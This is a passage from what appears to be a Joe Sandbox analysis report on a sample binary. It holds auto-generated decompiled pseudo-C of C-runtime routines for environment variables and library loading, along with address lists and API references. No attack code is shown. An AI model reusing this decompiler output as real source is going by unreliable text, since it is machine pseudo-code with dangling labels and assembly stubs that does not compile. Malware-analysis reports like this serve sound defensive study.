																					 *(_t303 + _t276 * 4) =  *(_t303 + 4 + _t276 * 4);
																					_t276 = _t276 + 1;
																					__eflags = _t276;
																				}
																				_push(4);
																				_push(_t276);
																				_t304 = E0024BAE7(_t303);
																				E00246ECD(_t221);
																				_t323 = _t323 + 0x10;
																				_t142 = _t289;
																				__eflags = _t304;
																				if(_t304 != 0) {
																					L77:
																					 *0x261954 = _t304;
																				}
																			} else {
																				_t142 = _v0;
																				_t289 = _t221;
																				 *(_t303 + _t276 * 4) = _t142;
																			}
																			__eflags = _a4 - _t221;
																			if(_a4 == _t221) {
																				goto L56;
																			} else {
																				_t254 = _t142;
																				_t81 = _t254 + 2; // 0x2
																				_t285 = _t81;
																				do {
																					_t143 =  *_t254;
																					_t254 = _t254 + 2;
																					__eflags = _t143 - _t221;
																				} while (_t143 != _t221);
																				_t82 = (_t254 - _t285 >> 1) + 2; // 0x0
																				_v16 = _t82;
																				_t305 = E00246F55(_t254 - _t285 >> 1, _t82, 2);
																				_pop(_t258);
																				__eflags = _t305;
																				if(_t305 == 0) {
																					L85:
																					E00246ECD(_t305);
																					goto L56;
																				} else {
																					_t148 = E002492D1(_t305, _v16, _v0);
																					_t324 = _t323 + 0xc;
																					__eflags = _t148;
																					if(_t148 != 0) {
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						E0024792D();
																						asm("int3");
																						_push(_t317);
																						_t318 = _t324;
																						_push(_t289);
																						_t291 = _v92;
																						__eflags = _t291;
																						if(_t291 != 0) {
																							_t260 = 0;
																							_t150 = _t291;
																							__eflags =  *_t291;
																							if( *_t291 != 0) {
																								do {
																									_t150 =  &(_t150[1]);
																									_t260 = _t260 + 1;
																									__eflags =  *_t150;
																								} while ( *_t150 != 0);
																							}
																							_t93 = _t260 + 1; // 0x2
																							_t306 = E00246F55(_t260, _t93, 4);
																							_t262 = _t305;
																							__eflags = _t306;
																							if(_t306 == 0) {
																								L102:
																								E00246E30(_t221, _t285, _t291, _t306);
																								goto L103;
																							} else {
																								__eflags =  *_t291;
																								if( *_t291 == 0) {
																									L100:
																									E00246ECD(0);
																									_t175 = _t306;
																									goto L101;
																								} else {
																									_push(_t221);
																									_t221 = _t306 - _t291;
																									__eflags = _t221;
																									do {
																										_t271 =  *_t291;
																										_t94 = _t271 + 1; // 0x5
																										_t285 = _t94;
																										do {
																											_t176 =  *_t271;
																											_t271 = _t271 + 1;
																											__eflags = _t176;
																										} while (_t176 != 0);
																										_t262 = _t271 - _t285;
																										_t95 = _t262 + 1; // 0x6
																										_v16 = _t95;
																										 *(_t221 + _t291) = E00246F55(_t262, _t95, 1);
																										E00246ECD(0);
																										_t324 = _t324 + 0xc;
																										__eflags =  *(_t221 + _t291);
																										if( *(_t221 + _t291) == 0) {
																											goto L102;
																										} else {
																											_t180 = E00246E73( *(_t221 + _t291), _v16,  *_t291);
																											_t324 = _t324 + 0xc;
																											__eflags = _t180;
																											if(_t180 != 0) {
																												L103:
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												E0024792D();
																												asm("int3");
																												_push(_t318);
																												_t319 = _t324;
																												_push(_t262);
																												_push(_t262);
																												_push(_t291);
																												_t292 = _v128;
																												__eflags = _t292;
																												if(_t292 != 0) {
																													_push(_t221);
																													_t223 = 0;
																													_t156 = _t292;
																													_t263 = 0;
																													_v20 = 0;
																													_push(_t306);
																													__eflags =  *_t292;
																													if( *_t292 != 0) {
																														do {
																															_t156 =  &(_t156[1]);
																															_t263 = _t263 + 1;
																															__eflags =  *_t156;
																														} while ( *_t156 != 0);
																													}
																													_t104 = _t263 + 1; // 0x2
																													_t307 = E00246F55(_t263, _t104, 4);
																													__eflags = _t307;
																													if(_t307 == 0) {
																														L119:
																														E00246E30(_t223, _t285, _t292, _t307);
																														goto L120;
																													} else {
																														__eflags =  *_t292 - _t223;
																														if( *_t292 == _t223) {
																															L117:
																															E00246ECD(_t223);
																															_t167 = _t307;
																															goto L118;
																														} else {
																															_t223 = _t307 - _t292;
																															__eflags = _t223;
																															do {
																																_t267 =  *_t292;
																																_t105 = _t267 + 2; // 0x6
																																_t285 = _t105;
																																do {
																																	_t168 =  *_t267;
																																	_t267 = _t267 + 2;
																																	__eflags = _t168 - _v20;
																																} while (_t168 != _v20);
																																_t107 = (_t267 - _t285 >> 1) + 1; // 0x3
																																_v24 = _t107;
																																_t170 = E00246F55(_t267 - _t285 >> 1, _t107, 2); // executed
																																 *(_t223 + _t292) = _t170;
																																E00246ECD(0);
																																_t324 = _t324 + 0xc;
																																__eflags =  *(_t223 + _t292);
																																if( *(_t223 + _t292) == 0) {
																																	goto L119;
																																} else {
																																	_t173 = E002492D1( *(_t223 + _t292), _v24,  *_t292);
																																	_t324 = _t324 + 0xc;
																																	__eflags = _t173;
																																	if(_t173 != 0) {
																																		L120:
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		E0024792D();
																																		asm("int3");
																																		_push(_t319);
																																		_push(_t223);
																																		_push(_t307);
																																		_push(_t292);
																																		_t293 =  *0x261950; // 0x57c160
																																		_t308 = _t293;
																																		__eflags =  *_t293;
																																		if( *_t293 == 0) {
																																			L127:
																																			_t309 = _t308 - _t293;
																																			__eflags = _t309;
																																			_t311 =  ~(_t309 >> 2);
																																		} else {
																																			_t225 = _v8;
																																			do {
																																				_t163 = E00249532(_v12,  *_t308, _t225);
																																				_t324 = _t324 + 0xc;
																																				__eflags = _t163;
																																				if(_t163 != 0) {
																																					goto L126;
																																				} else {
																																					_t165 =  *((intOrPtr*)(_t225 +  *_t308));
																																					__eflags = _t165 - 0x3d;
																																					if(_t165 == 0x3d) {
																																						L129:
																																						_t311 = _t308 - _t293 >> 2;
																																					} else {
																																						__eflags = _t165;
																																						if(_t165 == 0) {
																																							goto L129;
																																						} else {
																																							goto L126;
																																						}
																																					}
																																				}
																																				goto L128;
																																				L126:
																																				_t308 =  &(_t308[1]);
																																				__eflags =  *_t308;
																																			} while ( *_t308 != 0);
																																			goto L127;
																																		}
																																		L128:
																																		return _t311;
																																	} else {
																																		goto L115;
																																	}
																																}
																																goto L130;
																																L115:
																																_t292 = _t292 + 4;
																																__eflags =  *_t292 - _t173;
																															} while ( *_t292 != _t173);
																															_t223 = 0;
																															__eflags = 0;
																															goto L117;
																														}
																													}
																												} else {
																													_t167 = 0;
																													L118:
																													return _t167;
																												}
																											} else {
																												goto L98;
																											}
																										}
																										goto L130;
																										L98:
																										_t291 = _t291 + 4;
																										__eflags =  *_t291 - _t180;
																									} while ( *_t291 != _t180);
																									goto L100;
																								}
																							}
																						} else {
																							_t175 = 0;
																							L101:
																							return _t175;
																						}
																					} else {
																						_t274 =  &(_t305[_v20 + 1]);
																						 *(_t274 - 2) = _t148;
																						asm("sbb eax, eax");
																						_t185 = SetEnvironmentVariableW(_t305,  !( ~(_v9 & 0x000000ff)) & _t274);
																						__eflags = _t185;
																						if(_t185 == 0) {
																							_t186 = E00247BEF();
																							_t221 = _t221 | 0xffffffff;
																							__eflags = _t221;
																							 *_t186 = 0x2a;
																						}
																						goto L85;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t191 =  *0x261950; // 0x57c160
																	__eflags = _a4 - _t221;
																	if(_a4 == _t221) {
																		L58:
																		__eflags = _t246;
																		if(_t246 != 0) {
																			goto L56;
																		} else {
																			__eflags = _t191;
																			if(_t191 != 0) {
																				L62:
																				 *0x261954 = E00246F55(_t246, 1, 4);
																				E00246ECD(_t221);
																				_t323 = _t323 + 0xc;
																				goto L63;
																			} else {
																				 *0x261950 = E00246F55(_t246, 1, 4);
																				E00246ECD(_t221);
																				_t323 = _t323 + 0xc;
																				__eflags =  *0x261950 - _t221; // 0x57c160
																				if(__eflags == 0) {
																					goto L55;
																				} else {
																					_t303 =  *0x261954; // 0x586768
																					__eflags = _t303;
																					if(_t303 != 0) {
																						goto L64;
																					} else {
																						goto L62;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags = _t191;
																		if(_t191 == 0) {
																			goto L58;
																		} else {
																			_t196 = L002463C2(_t221, _t284);
																			__eflags = _t196;
																			if(_t196 != 0) {
																				L63:
																				_t303 =  *0x261954; // 0x586768
																				__eflags = _t303;
																				if(_t303 == 0) {
																					L55:
																					_t221 = _t220 | 0xffffffff;
																					__eflags = _t221;
																					L56:
																					E00246ECD(_t289);
																					_t136 = _t221;
																					goto L57;
																				} else {
																					goto L64;
																				}
																			} else {
																				goto L54;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t197 = E00247BEF();
														 *_t197 = 0x16;
														_t136 = _t197 | 0xffffffff;
														L57:
														return _t136;
													}
												} else {
													_t280 = _v16 + 1 + _t301 - _a4;
													asm("sbb eax, eax");
													 *(_t280 - 1) = _t218;
													_t204 = SetEnvironmentVariableA(_t301,  !( ~(_v5 & 0x000000ff)) & _t280);
													__eflags = _t204;
													if(_t204 == 0) {
														_t205 = E00247BEF();
														_t218 = _t218 | 0xffffffff;
														__eflags = _t218;
														 *_t205 = 0x2a;
													}
													goto L42;
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L14:
									__eflags = _t120;
									if(_t120 == 0) {
										 *0x261950 = E00246F55(_t231, 1, 4);
										E00246ECD(_t218);
										_t299 =  *0x261950; // 0x57c160
										_t321 = _t321 + 0xc;
										__eflags = _t299;
										if(_t299 == 0) {
											goto L11;
										} else {
											__eflags =  *0x261954 - _t218; // 0x586768
											if(__eflags != 0) {
												goto L20;
											} else {
												 *0x261954 = E00246F55(_t231, 1, 4);
												E00246ECD(_t218);
												_t321 = _t321 + 0xc;
												__eflags =  *0x261954 - _t218; // 0x586768
												if(__eflags == 0) {
													goto L11;
												} else {
													goto L19;
												}
											}
										}
									} else {
										_t218 = 0;
										goto L12;
									}
								} else {
									__eflags =  *0x261954 - _t218; // 0x586768
									if(__eflags == 0) {
										goto L14;
									} else {
										_t214 = L002463BD(0, _t283);
										__eflags = _t214;
										if(_t214 != 0) {
											L19:
											_t299 =  *0x261950; // 0x57c160
											L20:
											__eflags = _t299;
											if(_t299 == 0) {
												L11:
												_t218 = _t217 | 0xffffffff;
												__eflags = _t218;
												L12:
												E00246ECD(_t287);
												_t119 = _t218;
												goto L13;
											} else {
												goto L21;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				} else {
					_t215 = E00247BEF();
					 *_t215 = 0x16;
					_t119 = _t215 | 0xffffffff;
					L13:
					return _t119;
				}
				L130:
			}

0x0024a51c
0x0024a521
0x0024a538
0x0024a53a
0x0024a53f
0x0024a543
0x0024a544
0x0024a546
0x0024a596
0x0024a59b
0x00000000
0x0024a548
0x0024a548
0x0024a54a
0x00000000
0x0024a54c
0x0024a54c
0x0024a550
0x0024a556
0x0024a559
0x0024a55c
0x0024a562
0x0024a565
0x0024a56a
0x0024a56c
0x0024a56f
0x0024a570
0x0024a570
0x0024a576
0x0024a578
0x0024a57a
0x0024a60e
0x0024a611
0x0024a613
0x0024a615
0x0024a616
0x0024a617
0x0024a61c
0x0024a621
0x0024a623
0x0024a66d
0x0024a66d
0x0024a670
0x00000000
0x0024a676
0x0024a676
0x0024a678
0x0024a67b
0x0024a67b
0x0024a67e
0x0024a680
0x00000000
0x0024a686
0x0024a686
0x0024a68c
0x00000000
0x0024a692
0x0024a692
0x0024a694
0x0024a69c
0x0024a69e
0x0024a6a3
0x0024a6a6
0x0024a6a8
0x00000000
0x0024a6ae
0x0024a6ae
0x0024a6b1
0x0024a6b3
0x0024a6b6
0x0024a6b9
0x00000000
0x0024a6b9
0x0024a6a8
0x0024a68c
0x0024a680
0x0024a625
0x0024a625
0x0024a627
0x00000000
0x0024a629
0x0024a62c
0x0024a632
0x0024a635
0x0024a638
0x0024a64c
0x0024a64c
0x0024a64f
0x00000000
0x00000000
0x0024a648
0x0024a64b
0x0024a64b
0x0024a64b
0x0024a651
0x0024a653
0x0024a65b
0x0024a65d
0x0024a662
0x0024a665
0x0024a667
0x0024a669
0x0024a6bd
0x0024a6bd
0x0024a6bd
0x0024a63a
0x0024a63a
0x0024a63d
0x0024a63f
0x0024a63f
0x0024a6c3
0x0024a6c6
0x00000000
0x0024a6cc
0x0024a6cc
0x0024a6ce
0x0024a6d1
0x0024a6d1
0x0024a6d3
0x0024a6d4
0x0024a6d4
0x0024a6e0
0x0024a6e8
0x0024a6eb
0x0024a6ec
0x0024a6ee
0x0024a737
0x0024a738
0x00000000
0x0024a6f0
0x0024a6f7
0x0024a6fc
0x0024a6ff
0x0024a701
0x0024a743
0x0024a744
0x0024a745
0x0024a746
0x0024a747
0x0024a748
0x0024a74d
0x0024a751
0x0024a753
0x0024a756
0x0024a757
0x0024a75a
0x0024a75c
0x0024a76e
0x0024a76f
0x0024a770
0x0024a773
0x0024a775
0x0024a77a
0x0024a77e
0x0024a77f
0x0024a781
0x0024a7d2
0x0024a7d7
0x00000000
0x0024a783
0x0024a783
0x0024a785
0x00000000
0x0024a787
0x0024a787
0x0024a78d
0x0024a78f
0x0024a793
0x0024a796
0x0024a799
0x0024a79f
0x0024a7a1
0x0024a7a2
0x0024a7a8
0x0024a7ab
0x0024a7ad
0x0024a7ad
0x0024a7b3
0x0024a7b5
0x0024a842
0x0024a84d
0x0024a850
0x0024a855
0x0024a85a
0x0024a85c
0x0024a8a6
0x0024a8a6
0x0024a8a9
0x00000000
0x0024a8af
0x0024a8af
0x0024a8b1
0x0024a8b4
0x0024a8b4
0x0024a8b7
0x0024a8b9
0x00000000
0x0024a8bf
0x0024a8bf
0x0024a8c5
0x00000000
0x0024a8cb
0x0024a8cb
0x0024a8cd
0x0024a8d5
0x0024a8d7
0x0024a8dc
0x0024a8df
0x0024a8e1
0x00000000
0x0024a8e7
0x0024a8e7
0x0024a8ea
0x0024a8ec
0x0024a8ef
0x0024a8f2
0x00000000
0x0024a8f2
0x0024a8e1
0x0024a8c5
0x0024a8b9
0x0024a85e
0x0024a85e
0x0024a860
0x00000000
0x0024a862
0x0024a865
0x0024a86b
0x0024a86e
0x0024a871
0x0024a885
0x0024a885
0x0024a888
0x00000000
0x00000000
0x0024a881
0x0024a884
0x0024a884
0x0024a884
0x0024a88a
0x0024a88c
0x0024a894
0x0024a896
0x0024a89b
0x0024a89e
0x0024a8a0
0x0024a8a2
0x0024a8f6
0x0024a8f6
0x0024a8f6
0x0024a873
0x0024a873
0x0024a876
0x0024a878
0x0024a878
0x0024a8fc
0x0024a8ff
0x00000000
0x0024a905
0x0024a905
0x0024a907
0x0024a907
0x0024a90a
0x0024a90a
0x0024a90d
0x0024a910
0x0024a910
0x0024a91b
0x0024a91f
0x0024a927
0x0024a92a
0x0024a92b
0x0024a92d
0x0024a974
0x0024a975
0x00000000
0x0024a92f
0x0024a937
0x0024a93c
0x0024a93f
0x0024a941
0x0024a980
0x0024a981
0x0024a982
0x0024a983
0x0024a984
0x0024a985
0x0024a98a
0x0024a98d
0x0024a98e
0x0024a991
0x0024a992
0x0024a995
0x0024a997
0x0024a9a0
0x0024a9a2
0x0024a9a4
0x0024a9a6
0x0024a9a8
0x0024a9a8
0x0024a9ab
0x0024a9ac
0x0024a9ac
0x0024a9a8
0x0024a9b2
0x0024a9bd
0x0024a9c0
0x0024a9c1
0x0024a9c3
0x0024aa2a
0x0024aa2a
0x00000000
0x0024a9c5
0x0024a9c5
0x0024a9c8
0x0024aa1a
0x0024aa1c
0x0024aa22
0x00000000
0x0024a9ca
0x0024a9ca
0x0024a9cd
0x0024a9cd
0x0024a9cf
0x0024a9cf
0x0024a9d1
0x0024a9d1
0x0024a9d4
0x0024a9d4
0x0024a9d6
0x0024a9d7
0x0024a9d7
0x0024a9db
0x0024a9df
0x0024a9e3
0x0024a9ed
0x0024a9f0
0x0024a9f5
0x0024a9f8
0x0024a9fc
0x00000000
0x0024a9fe
0x0024aa06
0x0024aa0b
0x0024aa0e
0x0024aa10
0x0024aa2f
0x0024aa31
0x0024aa32
0x0024aa33
0x0024aa34
0x0024aa35
0x0024aa36
0x0024aa3b
0x0024aa3e
0x0024aa3f
0x0024aa41
0x0024aa42
0x0024aa43
0x0024aa44
0x0024aa47
0x0024aa49
0x0024aa52
0x0024aa53
0x0024aa55
0x0024aa57
0x0024aa59
0x0024aa5c
0x0024aa5d
0x0024aa5f
0x0024aa61
0x0024aa61
0x0024aa64
0x0024aa65
0x0024aa65
0x0024aa61
0x0024aa69
0x0024aa74
0x0024aa78
0x0024aa7a
0x0024aae8
0x0024aae8
0x00000000
0x0024aa7c
0x0024aa7c
0x0024aa7e
0x0024aad8
0x0024aad9
0x0024aadf
0x00000000
0x0024aa80
0x0024aa82
0x0024aa82
0x0024aa84
0x0024aa84
0x0024aa86
0x0024aa86
0x0024aa89
0x0024aa89
0x0024aa8c
0x0024aa8f
0x0024aa8f
0x0024aa9b
0x0024aa9f
0x0024aaa2
0x0024aaa7
0x0024aaad
0x0024aab2
0x0024aab5
0x0024aab9
0x00000000
0x0024aabb
0x0024aac3
0x0024aac8
0x0024aacb
0x0024aacd
0x0024aaed
0x0024aaef
0x0024aaf0
0x0024aaf1
0x0024aaf2
0x0024aaf3
0x0024aaf4
0x0024aaf9
0x0024aafc
0x0024aaff
0x0024ab00
0x0024ab01
0x0024ab02
0x0024ab08
0x0024ab0a
0x0024ab0d
0x0024ab39
0x0024ab39
0x0024ab39
0x0024ab3e
0x0024ab0f
0x0024ab0f
0x0024ab12
0x0024ab18
0x0024ab1d
0x0024ab20
0x0024ab22
0x00000000
0x0024ab24
0x0024ab26
0x0024ab29
0x0024ab2b
0x0024ab47
0x0024ab49
0x0024ab2d
0x0024ab2d
0x0024ab2f
0x00000000
0x00000000
0x00000000
0x00000000
0x0024ab2f
0x0024ab2b
0x00000000
0x0024ab31
0x0024ab31
0x0024ab34
0x0024ab34
0x00000000
0x0024ab12
0x0024ab40
0x0024ab46
0x00000000
0x00000000
0x00000000
0x0024aacd
0x00000000
0x0024aacf
0x0024aacf
0x0024aad2
0x0024aad2
0x0024aad6
0x0024aad6
0x00000000
0x0024aad6
0x0024aa7e
0x0024aa4b
0x0024aa4b
0x0024aae3
0x0024aae7
0x0024aae7
0x00000000
0x00000000
0x00000000
0x0024aa10
0x00000000
0x0024aa12
0x0024aa12
0x0024aa15
0x0024aa15
0x00000000
0x0024aa19
0x0024a9c8
0x0024a999
0x0024a999
0x0024aa25
0x0024aa29
0x0024aa29
0x0024a943
0x0024a947
0x0024a94a
0x0024a954
0x0024a95c
0x0024a962
0x0024a964
0x0024a966
0x0024a96b
0x0024a96b
0x0024a96e
0x0024a96e
0x00000000
0x0024a964
0x0024a941
0x0024a92d
0x0024a8ff
0x0024a860
0x0024a7bb
0x0024a7bb
0x0024a7c0
0x0024a7c3
0x0024a7f0
0x0024a7f0
0x0024a7f2
0x00000000
0x0024a7f4
0x0024a7f4
0x0024a7f6
0x0024a821
0x0024a82b
0x0024a830
0x0024a835
0x00000000
0x0024a7f8
0x0024a802
0x0024a807
0x0024a80c
0x0024a80f
0x0024a815
0x00000000
0x0024a817
0x0024a817
0x0024a81d
0x0024a81f
0x00000000
0x00000000
0x00000000
0x00000000
0x0024a81f
0x0024a815
0x0024a7f6
0x0024a7c5
0x0024a7c5
0x0024a7c7
0x00000000
0x0024a7c9
0x0024a7c9
0x0024a7ce
0x0024a7d0
0x0024a838
0x0024a838
0x0024a83e
0x0024a840
0x0024a7dd
0x0024a7dd
0x0024a7dd
0x0024a7e0
0x0024a7e1
0x0024a7e8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0024a7d0
0x0024a7c7
0x0024a7c3
0x0024a7b5
0x0024a785
0x0024a75e
0x0024a75e
0x0024a763
0x0024a769
0x0024a7eb
0x0024a7ef
0x0024a7ef
0x0024a703
0x0024a70c
0x0024a714
0x0024a718
0x0024a71f
0x0024a725
0x0024a727
0x0024a729
0x0024a72e
0x0024a72e
0x0024a731
0x0024a731
0x00000000
0x0024a727
0x0024a701
0x0024a6ee
0x0024a6c6
0x0024a627
0x0024a580
0x0024a580
0x0024a583
0x0024a5b4
0x0024a5b4
0x0024a5b6
0x0024a5c6
0x0024a5cb
0x0024a5d0
0x0024a5d6
0x0024a5d9
0x0024a5db
0x00000000
0x0024a5dd
0x0024a5dd
0x0024a5e3
0x00000000
0x0024a5e5
0x0024a5ef
0x0024a5f4
0x0024a5f9
0x0024a5fc
0x0024a602
0x00000000
0x00000000
0x00000000
0x00000000
0x0024a602
0x0024a5e3
0x0024a5b8
0x0024a5b8
0x00000000
0x0024a5b8
0x0024a585
0x0024a585
0x0024a58b
0x00000000
0x0024a58d
0x0024a58d
0x0024a592
0x0024a594
0x0024a604
0x0024a604
0x0024a60a
0x0024a60a
0x0024a60c
0x0024a5a1
0x0024a5a1
0x0024a5a1
0x0024a5a4
0x0024a5a5
0x0024a5ac
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0024a594
0x0024a58b
0x0024a583
0x0024a57a
0x0024a54a
0x0024a523
0x0024a523
0x0024a528
0x0024a52e
0x0024a5af
0x0024a5b3
0x0024a5b3
0x00000000

APIs

___from_strstr_to_strchr.LIBVCRUNTIME ref: 0024A53A

Part of subcall function 00246ECD: HeapFree.KERNEL32(00000000,00000000), ref: 00246EE3
Part of subcall function 00246ECD: GetLastError.KERNEL32(?,?,0024B527,?,00000000,?,00000000,?,0024B54E,?,00000007,?,?,0024B96B,?,?), ref: 00246EF5

Part of subcall function 00246F55: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00248462,00000001,00000364,?,?,?,00247BF4,00246F4A,?,?,002429E9,?), ref: 00246F96

SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0024A71F

Part of subcall function 0024792D: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0024792F
Part of subcall function 0024792D: GetCurrentProcess.KERNEL32(C0000417,00000000,00246EA0,00000000,?,00000003,00248430), ref: 00247951
Part of subcall function 0024792D: TerminateProcess.KERNEL32(00000000,?,00000003,00248430), ref: 00247958

_wcschr.LIBVCRUNTIME ref: 0024A775
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0024A95C

Strings

hgX, xrefs: 0024A585, 0024A5DD, 0024A5EF, 0024A5FC, 0024A787, 0024A7AD, 0024A817, 0024A82B, 0024A838, 0024A8F6

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 00244092, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E00244092(signed int _a4) {
				void* _t10;
				void* _t13;
				signed int _t15;
				signed int _t21;
				WCHAR* _t22;
				signed int* _t25;
				void* _t27;

				_t21 = _a4;
				_t25 = 0x2617cc + _t21 * 4;
				asm("lock cmpxchg [edi], ecx");
				if(0 == 0) {
					_t22 =  *(0x254230 + _t21 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				asm("sbb eax, eax");
				return  ~0x00000001 & 0;
			}

0x00244096
0x0024409e
0x002440a5
0x002440ad
0x002440ba
0x002440ca
0x002440d0
0x002440d4
0x002440fd
0x002440ff
0x00244103
0x00244106
0x00244106
0x0024410c
0x0024410e
0x00000000
0x0024410e
0x002440d6
0x002440df
0x002440ee
0x002440e1
0x002440e4
0x002440ea
0x002440ea
0x002440f2
0x00000000
0x002440f4
0x002440f7
0x002440f9
0x00000000
0x002440f9
0x002440f2
0x002440b4
0x00000000

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,H}W,?,?,00244039,?,H}W,00000000,?,?,002441DE,00000008,InitializeCriticalSectionEx), ref: 002440CA
GetLastError.KERNEL32(?,?,00244039,?,H}W,00000000,?,?,002441DE,00000008,InitializeCriticalSectionEx,00254324,InitializeCriticalSectionEx,00000000,?,00243F7E), ref: 002440D6
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,?,00244039,?,H}W,00000000,?,?,002441DE,00000008,InitializeCriticalSectionEx,00254324,InitializeCriticalSectionEx), ref: 002440E4
FreeLibrary.KERNEL32(00000000,?,?,00244039,?,H}W,00000000,?,?,002441DE,00000008,InitializeCriticalSectionEx,00254324,InitializeCriticalSectionEx,00000000), ref: 00244106

Strings

H}W, xrefs: 0024409B

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 0024A440, Relevance: 6.1, APIs: 4, Instructions: 68

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0024A440() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t8;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E0024A409(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t8 = E00246F07(_t19, _t7); // executed
						_t25 = _t8;
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E00246ECD(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}

0x0024a44f
0x0024a455
0x0024a4ad
0x0024a4ad
0x0024a457
0x0024a458
0x0024a45d
0x0024a466
0x0024a46c
0x0024a472
0x0024a477
0x00000000
0x0024a479
0x0024a47a
0x0024a47f
0x0024a484
0x0024a4a2
0x0024a49c
0x0024a49c
0x0024a49e
0x0024a49e
0x0024a4a5
0x0024a4aa
0x0024a477
0x0024a4b1
0x0024a4b4
0x0024a4b4
0x0024a4c2

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0024A449
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0024A46C

Part of subcall function 00246F07: RtlAllocateHeap.NTDLL(00000000,?,?,?,002429E9,?,?,002410DD,00000010), ref: 00246F39

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0024A492

Part of subcall function 00246ECD: HeapFree.KERNEL32(00000000,00000000), ref: 00246EE3
Part of subcall function 00246ECD: GetLastError.KERNEL32(?,?,0024B527,?,00000000,?,00000000,?,0024B54E,?,00000007,?,?,0024B96B,?,?), ref: 00246EF5

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0024A4B4

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 0024AC71, Relevance: 6.1, APIs: 4, Instructions: 52
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E0024AC71(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x261d30 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x255318 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x6083b07b
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x0024ac76
0x0024ac7a
0x0024ac81
0x0024ac85
0x0024ac93
0x0024aca3
0x0024aca9
0x0024acad
0x0024acd6
0x0024acd8
